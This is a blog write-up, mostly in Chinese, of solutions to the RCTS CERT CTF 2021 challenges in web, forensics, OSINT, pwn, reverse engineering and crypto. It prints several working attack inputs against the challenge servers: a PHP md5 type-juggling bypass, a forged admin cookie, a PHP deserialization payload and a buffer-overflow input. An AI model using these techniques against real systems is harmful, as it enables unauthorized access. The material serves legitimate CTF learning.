RCTS CERT CTF2021

Web

Some type of juggling

#web#php
Can you solve this challenge?
URL:http://challenges.defsoc.tk:8080
Flag format: flag{string}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
if(isset($_GET['source'])) {
highlight_file(__FILE__);
die();
} else {
$value = "240610708";
if (isset($_GET['hash'])) {
if ($_GET['hash'] === $value) {
die('It is not THAT easy!');
}
$hash = md5($_GET['hash']);
$key = md5($value);
if($hash == $key) {
include('flag.php');
print "Congratulations! Your flag is: $flag";
} else {
print "Flag not found!";
}
}
}
?>

md5后的结果要一样,可以用0e绕过,而且hash与value之间的关系是弱等,所以hash不能是数字。var_dump(md5(‘240610708’) == md5(‘QNKCDZO’));
解题

1
2
?hash=QNKCDZO
Congratulations! Your flag is: flag{php_typ3_juggl1ng_1s_c00l}

Exclusive access

#web#owasp10
We discovered a protected page. Can you bypass it?
URL:http://challenges.defsoc.tk:9999
Flag format: flag{string}

抓包得到

1
Cookie: user_type=Z3Vlc3Q%3D

url解码再base64解码得到guest,将admin逆操作得到YWRtaW4%3D,传过去得到flag

1
flag{br0k3n_auth3nt1c4t10n}

It is Magic after all

#web#php
Can you do some magic in this page?
URL:http://challenges.defsoc.tk:3000
Flag format: flag{string}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php 
include "flag.php";

class Magic {
public $key;

public function doMagic() {
if ($this->key === true) {
global $flag;
echo $flag;
}
else {
echo "Nothing...";
}
}
}

if (isset($_GET['magic'])) {
$magic = unserialize($_GET['magic']);
$magic->doMagic();
} else {
print "Nothing...";
}

?>

exp

1
2
3
4
5
6
7
8
9
10
<?php 

class Magic {
public $key=true;
}

$a = new Magic();
echo serialize($a);

?>

Payload:

1
2
?magic=O:5:"Magic":1:{s:3:"key";b:1;}
#flag{php_d3s3r14l1z4t10n_3xpl01ts}

Forensics

Hiding in plain sight

#forensi#images
I think there is something fishy about this image.
Can you help me out?
Flag format: flag{string}

010文件尾就是flag

1
flag{h1dd3n_t3xt_1n_pl41ns1ght}

Welcome to the challenge

#forensics#images
Welcome to the RCTS Challenge!
Can you find the flag?
Flag format: flag{string}

直接foremost分离图片

1
flag{0n3_1m4g3_1s_n0t_3n0ugh}

About us

#forensics#pdfs
This challenge is about the RCTS CERT at FCCN.
Can you get the flag?
Flag format: flag{string}

strings查看:

1
2
└─$ strings RCTSCERT-FCCN.pdf |grep flag                                                                                                      139 ⨯
<pdfx:Flag>flag{4b0ut_us_4t_rcts_c3rt}</pdfx:Flag>

Keyp it universal

#foren#pcap
We intercepted a strange communication which we believe has important information inside.
Can you retrieve the information from it?
Flag format: flag{string}
Regex: flag{[0-9a-z_]+}

USB键盘流量

1
2
3
tshark -r capture.pcap -T fields -e usb.capdata > usbdata.txt

tshark -r capture.pcap -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

加冒号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
f=open('usbdata.txt','r')
fi=open('out.txt','w')
while 1:
a=f.readline().strip()
if a:
if len(a)==16: # 键盘流量len=16,鼠标流量len=8
out=''
for i in range(0,len(a),2):
if i+2 != len(a):
out+=a[i]+a[i+1]+":"
else:
out+=a[i]+a[i+1]
fi.write(out)
fi.write('\n')
else:
break

fi.close()

keyborad.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
normalKeys = {
"04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
"09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
"0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
"13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
"18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
"1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
"22":"5", "23":"6","24":"7","25":"8","26":"9",
"27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
"2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
"32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
"38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
"3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
"44":"<F11>","45":"<F12>"}
shiftKeys = {
"04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
"09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
"0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
"13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
"18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
"1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
"22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
"28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
"2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
"34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
"3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
"41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')
for line in keys:
try:
if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
else:
output += ['[unknown]']
except:
pass

keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
try:
a=output.index('<DEL>')
del output[a]
del output[a-1]
except:
pass

for i in range(len(output)):
try:
if output[i]=="<CAP>":
flag+=1
output.pop(i)
if flag==2:
flag=0
if flag!=0:
output[i]=output[i].upper()
except:
pass

print ('output :' + "".join(output))

得到

1
2
3
4
┌──(kali㉿kali)-[~/桌面]
└─$ python keyboard2.py capture.pcap
flagusbp4ck3tc4ptur31sfun
output :flagusbp4ck3tc4ptur31sfun

最终flag

1
flag{usb_p4ck3t_c4ptur3_1s_fun}

Maybe the helper can help*

You might not see it, but a flag lies within.
Flag Format: flag{string}
the-jetsons-family.jpg

参考其他人的wp:

1
2
3
4
5
6
使用 stegseek 我们得到的关键短语是 rosie
stegseek --crack the-jetsons-family.jpg --wordlist /usr/share/dict/rockyou.txt

cat the-jetsons-family.jpg.out

cat the-jetsons-family.jpg.out | base64 -d | base64 -d

OSINT

Welcome to Lisbon!

Oh, some activists defaced a Victoria Secret’s store.
Find out which was the model whose photo was damaged.
Flag format: flag{firstname_surname}

社工题

welcome_to_lisbon.jpg

image-20210815000735730

从题目名字我们可以知道这家商店位于葡萄牙的里斯本,谷歌搜索 Victoria Secret Lisbon可以找到店铺位置

image-20210815000614963

题目所给图片被打码的就是这个模特,搜索Victoria Secret model可以找到是这位模特
image-20210815000703316

阿德瑞娜·利玛 (Adriana Lima)

1
flag{adriana_lima}

Mission

Something Suspicious

#mission#logging
We have detected a strange activity inside our network and manage to get some logs from it.
Can you see what happened and if there was a host compromised?
Flag format: flag{string}
ftp.log
ssh.log

1
2
ftp.log:	ZmxhZ3tzMG0zdGgxbmc=  ->  flag{s0m3th1ng
ssh.log: X3N1c3AxYzEwdXN9 -> _susp1c10us}

最终flag

1
flag{s0m3th1ng_susp1c10us}

PWN

Well hello there

#pwn#c
We initiated the development of a bot. So far it greets you by your name. Can you test it?
Access: nc challenges.defsoc.tk 22228
Flag format: flag{string}

拖入IDA查看main函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[76]; // [rsp+0h] [rbp-58h] BYREF
int v5; // [rsp+4Ch] [rbp-Ch]

puts("Hello there! What is your name?");
fflush(_bss_start);
v5 = 0;
gets(v4, argv);
if ( v5 )
system("cat flag.txt");
else
printf("Well, hello %s!", v4);
putchar(10);
return 0;
}

缓冲区溢出,name超过 76 个字符即可

1
2
3
4
5
6
7
8
9
10
└─$ ./program_local        
Hello there! What is your name?
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
flag{Waw!_Y0u_D1d!_it_^_^}


$ nc challenges.defsoc.tk 22228
Hello there! What is your name?
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
flag{buff3r_0v3rfl0w_r0cks}

web手做出的第一个pwn题

Reverse Engineering

You are not allowed

#reverse#c
Can you reverse this program and get us the flag?
Flag format: flag{string}

这个逆向也很简单,拖入IDA找到main函数,然后F5,可以看到sub_401242函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char s[64]; // [rsp+0h] [rbp-50h] BYREF
char *s1; // [rsp+40h] [rbp-10h]
int v6; // [rsp+4Ch] [rbp-4h]

v6 = 0;
puts("Enter the secret key : ");
fgets(s, 64, stdin);
s1 = sub_401242();
if ( !strncmp(s1, s, 0xFuLL) )
v6 = 1;
else
puts("Wrong key entered! Try again? ");
if ( v6 )
sub_401182();
putchar(10);
return 0LL;
}

找到sub_401242函数,同样F5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
char *sub_401242()
{
char v1[15]; // [rsp+9h] [rbp-27h] BYREF
char *s; // [rsp+18h] [rbp-18h]
char *dest; // [rsp+20h] [rbp-10h]
unsigned __int64 i; // [rsp+28h] [rbp-8h]

qmemcpy(v1, "Sup3rS3cr3tK3y#", sizeof(v1));
dest = (char *)malloc(4uLL);
s = (char *)malloc(0x1FuLL);
for ( i = 0LL; i <= 0xE; ++i )
{
sprintf(s, "%c", (unsigned __int8)v1[i]);
strcat(dest, s);
}
return dest;
}

可以看到字符串Sup3rS3cr3tK3y#,输入即可得到flag

1
2
3
4
5
6
┌──(kali㉿kali)-[~/桌面]
└─$ ./program
Enter the secret key :
Sup3rS3cr3tK3y#
flag{1ntr0_t0_r3v3rs3_3ng1n33r1ng}

Crypto

A simple challenge

#crypto#encoding
We have intercepted the following message and we think it has a secret flag in it.
Can you decode it?
Flag format: flag{string}

secret_message.txt:

1
Vm0weE1HRXlTWGxVYTJoVllXeGFVMWx0ZEV0alZuQlhWbXQwYVUxVk5WZFpWVlUxWVZaS2RHUkVXbFpOYWtVd1dWUkdSbVF4VG5GUmJHaHBVakpvVVZkc1pEUmpNV1JIWTBWb2JGSnJTbTlXYkZaM1RVWmtXR1JIZEZOTmEzQXdWbTF3WVZaWFNuTlhiVVpoVmpOU1RGa3llRk5XTVd3MlVtMXNhVkl5WTNsV1Z6QXhaREZrVmsxWVJsWmhhelZvVld4YWNrMUdjRmhOVlhSclVteEtNVmxyWkRSWFJrcFdZa1JPVjFKc2NGUlZWRXBUVm0xS1IySkZOVk5TUlVVMQ==

exp:

1
2
3
4
5
6
7
8
9
10
11
12
import base64
str="Vm0weE1HRXlTWGxVYTJoVllXeGFVMWx0ZEV0alZuQlhWbXQwYVUxVk5WZFpWVlUxWVZaS2RHUkVXbFpOYWtVd1dWUkdSbVF4VG5GUmJHaHBVakpvVVZkc1pEUmpNV1JIWTBWb2JGSnJTbTlXYkZaM1RVWmtXR1JIZEZOTmEzQXdWbTF3WVZaWFNuTlhiVVpoVmpOU1RGa3llRk5XTVd3MlVtMXNhVkl5WTNsV1Z6QXhaREZrVmsxWVJsWmhhelZvVld4YWNrMUdjRmhOVlhSclVteEtNVmxyWkRSWFJrcFdZa1JPVjFKc2NGUlZWRXBUVm0xS1IySkZOVk5TUlVVMQ=="
num=0
try:
while True :
num=num+1
print("第%d次解码" %(num))
str = base64.b64decode(str.encode('utf-8'))
str=str.decode('ascii')
print(str)
except Exception as e:
print("END")

得到

1
This is a secret message: flag{3nc0d1ng_1s_n0t_3ncrypt10n!}

Roman encryption

#crypto#cipher
We intercepted an encrypted communication that was meant to be delivered to a threat actor named Julius.
Apparently his name is the key to decipher this message.
Can you decipher it?
Flag format: flag{string}

1
2
3
Csddk Rtdetp,
Qcghb ykt jko ykto ptmmkoq,
Ykt igh tps qcep bsy qk osisevs ykto oswgou: jdgl{5ta5q1qtq10h_1p_b3y}

https://quipqiup.com/令jdgl=flag

1
Hello Julius, Thank you for your support, You can use this key to receive your reward: flag{5um5t1tut10n_1s_k3y}

提交flag不对,继续查看题目提示,应该是带key的凯撒密码

解密网站:https://www.boxentriq.com/code-breaking/keyed-caesar-cipher
搜索 Julius得到全称Gaius Julius Caesar,即为key解密得到flag

1
2
3
4
Niji ce uni pieebai:
Hello Julius,
Thank you for your support,
You can use this key to receive your reward: flag{5ub5t1tut10n_1s_k3y}

Hextraordinary security

#crypto#encoding
We just found this garbage file.
Can you decode it and retrieve any useful information from it?
Flag format: flag{string}

hex转str

1
flag{h3x4d3c1m4l_4s_4n_0bfusc4t10n_t00l}

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!